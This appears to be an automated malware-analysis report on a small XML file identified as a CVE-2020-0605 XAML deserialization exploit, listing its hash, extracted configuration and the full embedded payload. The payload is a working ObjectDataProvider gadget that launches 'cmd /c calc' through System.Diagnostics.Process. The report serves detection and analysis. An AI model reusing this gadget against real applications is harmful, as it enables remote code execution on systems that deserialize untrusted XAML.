Malicious

xdfa66.xml

Unknown | MD5: d5c60ba4bb1bbe83738349aacadf0556 | Size: 659 B

CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Characteristics
File Structure
xdfa66.xml
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Malware Configuration - XAML RCE Payload
Config. Field | Value
Command | cmd
Arguments | /c calc

Artefacts
Name | Value
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>
